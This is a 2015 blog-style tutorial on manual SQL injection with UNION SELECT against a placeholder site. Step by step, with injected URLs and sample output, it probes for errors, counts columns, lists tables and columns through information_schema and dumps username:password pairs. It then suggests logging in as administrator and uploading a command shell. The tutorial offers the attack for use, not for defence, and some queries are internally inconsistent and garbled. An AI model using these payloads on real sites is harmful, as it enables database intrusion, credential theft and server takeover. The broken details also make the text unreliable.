By: Kevin Mark
August 11, 2015
Guide: How to Manually Perform SQL Injection with UNION SELECT
By: Kevin Mark
August 11, 2015
Our target today is: https://target.com/index.php?id=5We want to find out if our target if vulnerable to SQL. Let's check if an MYSQL errors come up when we're adding a ( ' ) into the syntax: https://target.com/index.php?id=5...And it did!
You have an error in your SQL syntax; check the manual that corresponds to your..... ContinuedSo, it's time to make sure we actually can work this out like we want. We're going to work with "ORDER BY" - the order by helps us to find out how many columns there are. Let's start out with adding 5 - at the start - to see if it goes all normal or an error comes up when adding too many.
- https://target.com/index.php?id=5 ORDER BY 5-- (it still looks all normal here; let's increase the number 5 more.)
- https://target.com/index.php?id=5 ORDER BY 10-- (oops, something happened here; it comes up with this error...)
Unknown column '10' in 'order clause'Unknown column '10' in 'order clause'Alright, so instead of trying to add 10, we're going to add 9-- for example, and whoops, the error disappears. Now know there's 9 columns on our target. It's time to take it to another step, since we know the columns. We want to know which one we're going to inject into. In that vein, we're going to work with UNION SELECT.
- https://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9-- (Something came up, some numbers, it's easy here! There are small numbers/normal numbers and ones that are different; the number that's bold.
53We know the column we're going to work with here is 5. So, let's inject it now by doing following:
- https://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables
CHARACTER_SETS,CLIENT_STATISTICS,COLUMNSYou will see much more than this. It's different from what you see - but one thing is one hundred; you're inside. Now, we want to go even further with this. We want to see our valuable stuff. So that we can actually see some stuff to work with, we're going to type:
- http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_schema=database()--
ID,USERNAME,LIST,PASSWORD,MAIL,LINKS,.......And, if it's even worse, PHPMYADMIN, MYSQL, CREDITCARDS, PSN and such can be there also. It's a very dangerous situation for the target. We have now decided that we want to get the USERNAME:PASSWORD from our target.
- http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7 from database--
administrator:badsecurityThis target has a plaintext password ups, so dumb! In other situations, you'll see the password normally in a MD5 Hash and some others are encrypted. We now have the username:password. Let's find the administration login and use it. If the target has PHPMYADMIN there, it was just about to actually find the PHPMYADMIN Panel. From there, you can do something very dangerous also by adding a CMD Shell. Then, you can actually upload another shell with more features.
As a little extra I uploaded a pastebin to show you some additional methods than just UNION SELECT (but now in a tutorial, just an overview).